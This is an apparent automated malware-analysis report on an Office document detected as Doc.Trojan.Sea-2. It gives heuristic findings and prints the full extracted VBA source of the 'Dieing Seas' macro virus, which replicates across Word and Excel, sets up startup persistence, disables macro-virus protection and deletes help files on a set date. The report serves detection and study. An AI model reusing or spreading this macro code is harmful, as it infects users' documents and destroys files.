MALICIOUS
336
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains legacy WordBasic and VBA macros, including an AutoOpen macro that calls other malicious functions. The RunAtStartUp subroutine explicitly creates a VBScript file at 'c:\windows\Start Menu\Programs\StartUp\StartUp.vbs' which is designed to establish persistence by importing a second-stage payload exported as 'c:\windows\system\code.infected'. The SickBomb subroutine contains a conditional message box and attempts to delete .cnt files, suggesting a destructive or disruptive intent.
Heuristics 8
-
ClamAV: Doc.Trojan.Sea-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Sea-2
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.DeleteLines Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.countoflines -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print vbs; "Set WordObj=CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4787 bytes |
SHA-256: 490b9499a4189f7c6d334229e90a69dc182591992ba3104510a0f9aed6e23667 |
|||
|
Detection
ClamAV:
Doc.Trojan.Sea-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DieingSeas"
Sub DieLikeEver1()
On Error Resume Next
Dim an As Boolean, ar As Boolean
VBA.SetAttr NormalTemplate.FullName, vbNormal
Options.SaveNormalPrompt = 1 - 1
VBE.ActiveVBproject.VBComponents("DieingSeas").Export "c:\ra"
Set nonono = NormalTemplate.VBProject.VBComponents
Set acacac = ActiveDocument.VBProject.VBComponents
For x = 1 To nonono.Count
If nonono(x).Name = "DieingSeas" Then an = True
Next x
For f = 1 To acacac.Count
If acacac(f).Name = "DieingSeas" Then ar = True
Next f
If an = True And ar = False Then acacac.import "c:\ra"
If an = False And ar = True Then nonono.impory "c:\ra"
Kill "c:\ra"
End Sub
Sub AutoOpen()
On Error Resume Next
DieLikeEvery1
JmpToExcell
SickBomb
RunAtStartUp
End Sub
Sub SickBomb()
On Error Resume Next
If Day(Now) = 13 Then
MsgBox "We are Just A Drop In The Ocean!", vbApplicationModal, "Dieing Seas"
Do
Ram = InputBox("Give me a word!", "Now")
Loop Until Ram = "Die"
MsgBox "Die"
Kill "c:\windows\help\*.cnt"
End If
End Sub
Sub RunAtStartUp()
On Error Resume Next
VBE.ActiveVBproject.VBComponents("DieingSeas").Export "c:\windows\system\code.infected"
Kill "c:\windows\Start Menu\Programs\StartUp\StartUp.vbs"
Open "c:\windows\Start Menu\Programs\StartUp\StartUp.vbs" For Random As vbs
Print vbs; "On Error Resume Next"
Print vbs; "Set WordObj=CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print vbs; "Set NT=WordObj.NormalTemplate"
Print vbs; "NT.VBproject.Vbcomponents.import " & Chr(34) & "C:\windows\system\code.infected" & Chr(34)
Print vbs; "nt.save"
Print vbs; "WordObj.Close"
Close vbs
End Sub
Sub JumpToExcell()
On Error Resume Next
Set Exc = CreateObject("Excel.Application")
SetAttr Exc.StartupPath & "\book1.", vbNormal
Set nr = Exc.Workbooks.Add
Set rt = nr.Vbprojects.VBComponents("ThisWorkBook").CodeModule
rt.InserLines 1, VBE.ActiveVBproject.VBComponents("DieingSeas").CodeModule.Lines(1, 123)
nr.SaveAs Exc.StatUpPath & "\book1."
nr.Close
End Sub
Private Sub Workbook_Open()
On Error Resume Next
Application.ScreenUpdating = (4 - 4)
Application.EnableCancelKey = xlDisabled
Options.VirusProtection = (0 - 0)
If (Dir(Application.StartupPath & "\Book1.")) <> "" Then
SetAttr Application.StartupPath * "\Book1.", vbNormal
End If
Set Grand = Workbooks.Add
Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.DeleteLines Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.countoflines
f = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, 123)
Grand.VBProject.VBComponents("ThisWotkbook").CodeModule.AddfromString
Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False
Grand.Close
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ActiveWorkbook.Path
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute msoSortByFileName
For x = 1 To fs.FoundFiles.Count
Set tEmp = Workbooks.Open(fs.FoundFiles(x))
If tEmp.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, 1) <> "Sub DieLikeEvery1()" Then
tEmp.VBProject.VBComponents("ThisWorkbook").CodeModule.DeleteLines Grand.VBProject.VBComponents("ThisWorkbook").CodeModule.countoflines
Source = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, 123)
tEmp.VBProject.VBComponents("ThisWotkbook").CodeModule.AddfromString
tEmp.Save
End If
tEmp.Close
Next x
Application.ScreenUpdating = True
SickBomb
JmpWord
End Sub
Sub JmpWord()
On Error Resume Next
conte = VBE.ActiveVBproject.VBComponents("DieingSeas").CodeModule.Lines(1, 123)
Set wordobj = CreateObject("Word.Application")
Set nt = wordobj.NormalTemplate.VBProject.VBComponents
Set fso = CreateObject("Scripting.FileSystemObject")
Kill "c:\ra"
Set r = fso.opentextfile("C:\ra", 2, True)
r.writeline "Attribute VB_Name = " & Chr(34) & "DieingSeas" & Chr(34)
r.writeline conte
r.Close
nt.import "c:\ra"
wordobj.NormalTemplate.Save
Kill "c:\ra"
wordobj.Quit
End Sub
Sub ViewVbCode()
MsgBox "Dll viewcode.dll Required!", vbCritical, "External Error"
End Sub
Sub ToolsMacro()
MsgBox "Dll viewcode.dll Required!", vbCritical, "External Error"
End Sub
Rem +++++++++Dieing Seas Office 97 Virus+++++++++
Rem This is a little bug that infects excel and
Rem Word at the same time :-)
Rem It isn't very good bcoz too much work lately
Rem Also it's stealth Sux
Rem In a newer Version Everything will be differnt
Rem ++++++++++++++++++++++++++++++++++++++++++++++
Rem Created By Yozak=00= for MetaPhase :-) greetz to Knowdeth & bsl4
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.